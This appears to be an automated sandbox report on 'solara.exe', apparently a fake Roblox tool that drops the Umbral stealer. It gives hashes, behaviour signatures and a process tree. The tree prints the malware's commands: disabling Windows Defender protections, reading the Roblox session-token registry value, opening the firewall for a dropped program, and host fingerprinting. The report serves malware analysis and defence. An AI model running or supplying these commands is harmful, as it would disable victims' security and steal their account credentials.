Analysis

  • max time kernel
    146s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250410-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/04/2025, 15:32

General

  • Target

    solara.exe

  • Size

    2.8MB

  • MD5

    84c1cc9f977f79b4820bcb8f236fce20

  • SHA1

    88d879456a7f075760525824dcc8b2de7bbe6f13

  • SHA256

    808fc30e9ed9cf43a86b6608fc9c5f5c28443d51207f30d06cf88c0081b54e18

  • SHA512

    66b98b55c9d36b27a0f96eba539b820450ba552deacc323dabfbe4db936eb5ad4c57cb8683e10570212ce1b6ea9f04adeaecd9f41618e4625f78bc5b87f3f65c

  • SSDEEP

    49152:N5wRNpPAI7CYItONjnwsp61qLJa2uQzdqYoqDLdS96A4zDziq2EJLFp2C/XHYQ/:NaRvROYEQEqFajKoqDLgMAI2KLmC/XHv

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 39 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 38 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\solara.exe
    "C:\Users\Admin\AppData\Local\Temp\solara.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4872
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5560
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1048
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5192
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:2056
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2476
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:3228
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        "C:\Users\Admin\AppData\Local\Temp\Server.exe"
        2⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4792
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Server.exe" "Server.exe" ENABLE
          3⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:2136
      • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        2⤵
        • Executes dropped EXE
        PID:5804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4280
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5864
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:3460
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3060
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4336
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5296
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4340
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4616
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4532
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4268
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4932
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5752
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2508
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4928
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4916
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:692
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5540
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3076
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4744
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5304
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:324
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3256
      • C:\Users\Admin\AppData\Local\Temp\Server.exe
        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:5712
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
      1⤵
        PID:3044
        • C:\Users\Admin\AppData\Local\Temp\Server.exe
          C:\Users\Admin\AppData\Local\Temp\Server.exe ..
          2⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:5676
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
        1⤵
          PID:3504
          • C:\Users\Admin\AppData\Local\Temp\Server.exe
            C:\Users\Admin\AppData\Local\Temp\Server.exe ..
            2⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
          1⤵
            PID:6068
            • C:\Users\Admin\AppData\Local\Temp\Server.exe
              C:\Users\Admin\AppData\Local\Temp\Server.exe ..
              2⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:5252
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
            1⤵
              PID:2988
              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                2⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2996
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
              1⤵
                PID:4904
                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                  C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                  2⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:5792
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                1⤵
                  PID:1280
                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                    C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                    2⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1000
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                  1⤵
                    PID:4736
                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                      C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                      2⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:572
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                    1⤵
                      PID:4740
                      • C:\Users\Admin\AppData\Local\Temp\Server.exe
                        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                        2⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:3464
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                      1⤵
                        PID:5332
                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                          C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                          2⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:3456
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                        1⤵
                          PID:4508
                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                            C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                            2⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2428
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                          1⤵
                            PID:1444
                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                              C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                              2⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:1164
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                            1⤵
                              PID:1920
                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                2⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:940
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                              1⤵
                                PID:1740
                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                  C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                  2⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:4692
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                1⤵
                                  PID:2520
                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                    C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                    2⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:4440
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                  1⤵
                                    PID:2188
                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                      C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                      2⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:4600
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                    1⤵
                                      PID:4472
                                      • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                        2⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:1204
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                      1⤵
                                        PID:3696
                                        • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                          C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                          2⤵
                                          • Executes dropped EXE
                                          • System Location Discovery: System Language Discovery
                                          PID:5328
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                        1⤵
                                          PID:564
                                          • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                            C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                            2⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:2236
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                          1⤵
                                            PID:5584
                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                              C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                              2⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:4868
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                            1⤵
                                              PID:4808
                                              • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:4080
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                              1⤵
                                                PID:5728
                                                • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                  C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4564
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                                1⤵
                                                  PID:5760
                                                  • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                    C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2772
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                                  1⤵
                                                    PID:5652
                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                      C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      PID:5404
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Server.exe" ..
                                                    1⤵
                                                      PID:6112
                                                      • C:\Users\Admin\AppData\Local\Temp\Server.exe
                                                        C:\Users\Admin\AppData\Local\Temp\Server.exe ..
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4404

                                                    Network

                                                    MITRE ATT&CK Enterprise v16

                                                    Replay Monitor

                                                    Loading Replay Monitor...

                                                    Downloads

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Server.exe.log

                                                      Filesize

                                                      319B

                                                      MD5

                                                      824ba7b7eed8b900a98dd25129c4cd83

                                                      SHA1

                                                      54478770b2158000ef365591d42977cb854453a1

                                                      SHA256

                                                      d182dd648c92e41cd62dccc65f130c07f0a96c03b32f907c3d1218e9aa5bda03

                                                      SHA512

                                                      ae4f3a9673711ecb6cc5d06874c587341d5094803923b53b6e982278fa64549d7acf866de165e23750facd55da556b6794c0d32f129f4087529c73acd4ffb11e

                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                      Filesize

                                                      2KB

                                                      MD5

                                                      d85ba6ff808d9e5444a4b369f5bc2730

                                                      SHA1

                                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                                      SHA256

                                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                      SHA512

                                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      948B

                                                      MD5

                                                      c9b6705519e1eef08f86c4ba5f4286f3

                                                      SHA1

                                                      6c6b179e452ecee2673a1d4fe128f1c06f70577f

                                                      SHA256

                                                      0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

                                                      SHA512

                                                      6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      d3235ed022a42ec4338123ab87144afa

                                                      SHA1

                                                      5058608bc0deb720a585a2304a8f7cf63a50a315

                                                      SHA256

                                                      10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

                                                      SHA512

                                                      236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      1KB

                                                      MD5

                                                      107102102e02e48f37f5318c7e113c43

                                                      SHA1

                                                      7fb10fc65c85fb4c050309f0872bc9389dcccc0d

                                                      SHA256

                                                      3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

                                                      SHA512

                                                      b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Filesize

                                                      944B

                                                      MD5

                                                      e7d0883e28000a6270cf6b3b3f7b6c5a

                                                      SHA1

                                                      74d916eb15baa5ce4a168cd80d3d2c45d503daa2

                                                      SHA256

                                                      63f3369719ec0f4063138a71ba369a25fb4824bc035eaa4072ee6a5a1812480a

                                                      SHA512

                                                      4b4ade064020959bc677689fa658816c8c498c8117df70a1ae4076533972593b4e2c3bf45d39e28662892e12db07641f14870ef69292e81030f8b3d7c92302f1

                                                    • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe

                                                      Filesize

                                                      3.4MB

                                                      MD5

                                                      07b2ed9af56f55a999156738b17848df

                                                      SHA1

                                                      960e507c0ef860080b573c4e11a76328c8831d08

                                                      SHA256

                                                      73427b83bd00a8745e5182d2cdb3727e654ae9af5e42befc45903027f6606597

                                                      SHA512

                                                      3a982d1130b41e6c01943eee7fa546c3da95360afdad03bff434b9211201c80f22bd8bf79d065180010bc0659ee1e71febbfd750320d95811ee26a54ee1b34c6

                                                    • C:\Users\Admin\AppData\Local\Temp\Server.exe

                                                      Filesize

                                                      32KB

                                                      MD5

                                                      c30d7d561c7cd145687cfec82a8dc436

                                                      SHA1

                                                      6cd3cc34b5074a8b25a1d1b605d56ed9b0bc4203

                                                      SHA256

                                                      d467702296dbb5c5f84db6ffa8373684b429997c0ea3f1e2c88365250239bf01

                                                      SHA512

                                                      f8f1c5aaca62a20dd9342491a9d82571c8c280807dd61c9bd91d035436651115fce371bed4cab19af325b4b956b36fcd4ec93cccb433229438047947078260c8

                                                    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                                                      Filesize

                                                      229KB

                                                      MD5

                                                      dcd9253fa3b14afa8d8e636315517897

                                                      SHA1

                                                      37fcf6a0b4b67e99ad6b4e2c51f0fab9f0874052

                                                      SHA256

                                                      83fa6a1e67c9ecd7ec68e905c4474274340b96b718da2dbab29cc7fcc4c3e414

                                                      SHA512

                                                      6cdc1cb0795a2ce33c377141b643b969da1ac7b9708a348115cfe89522f605c99b2f8c3f5cbe08059af0fae1e1a44e9cf05728de7fc50aeb8a78d813e7d80758

                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1crslhf.1uf.ps1

                                                      Filesize

                                                      60B

                                                      MD5

                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                      SHA1

                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                      SHA256

                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                      SHA512

                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                    • memory/2288-3-0x00007FFE33360000-0x00007FFE33E21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/2288-0-0x00007FFE33363000-0x00007FFE33365000-memory.dmp

                                                      Filesize

                                                      8KB

                                                    • memory/2288-41-0x00007FFE33360000-0x00007FFE33E21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/2288-1-0x0000000000F70000-0x0000000001246000-memory.dmp

                                                      Filesize

                                                      2.8MB

                                                    • memory/4656-80-0x000001E82EF70000-0x000001E82EFE6000-memory.dmp

                                                      Filesize

                                                      472KB

                                                    • memory/4656-81-0x000001E82EEF0000-0x000001E82EF40000-memory.dmp

                                                      Filesize

                                                      320KB

                                                    • memory/4656-137-0x00007FFE33360000-0x00007FFE33E21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4656-24-0x000001E814800000-0x000001E814840000-memory.dmp

                                                      Filesize

                                                      256KB

                                                    • memory/4656-118-0x000001E82EF40000-0x000001E82EF4A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/4656-119-0x000001E82EFF0000-0x000001E82F002000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/4656-37-0x00007FFE33360000-0x00007FFE33E21000-memory.dmp

                                                      Filesize

                                                      10.8MB

                                                    • memory/4656-40-0x000001E82ECA0000-0x000001E82ECB0000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4656-82-0x000001E82EC60000-0x000001E82EC7E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/4792-39-0x0000000000D10000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4792-141-0x0000000000D10000-0x0000000000D20000-memory.dmp

                                                      Filesize

                                                      64KB

                                                    • memory/4872-54-0x00000253B5320000-0x00000253B5342000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/5804-42-0x000002ED6C420000-0x000002ED6C790000-memory.dmp

                                                      Filesize

                                                      3.4MB

                                                    • memory/5804-66-0x000002ED73A40000-0x000002ED73A48000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/5804-63-0x000002ED73370000-0x000002ED7337A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/5804-61-0x000002ED73410000-0x000002ED73426000-memory.dmp

                                                      Filesize

                                                      88KB

                                                    • memory/5804-62-0x000002ED73380000-0x000002ED7338A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/5804-60-0x000002ED73390000-0x000002ED73398000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/5804-59-0x000002ED733E0000-0x000002ED73406000-memory.dmp

                                                      Filesize

                                                      152KB

                                                    • memory/5804-58-0x000002ED73360000-0x000002ED7336A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/5804-57-0x000002ED74680000-0x000002ED74780000-memory.dmp

                                                      Filesize

                                                      1024KB

                                                    • memory/5804-56-0x000002ED73310000-0x000002ED7331E000-memory.dmp

                                                      Filesize

                                                      56KB

                                                    • memory/5804-55-0x000002ED733A0000-0x000002ED733D8000-memory.dmp

                                                      Filesize

                                                      224KB

                                                    • memory/5804-44-0x000002ED73320000-0x000002ED73328000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/5804-43-0x000002ED6CB50000-0x000002ED6CB60000-memory.dmp

                                                      Filesize

                                                      64KB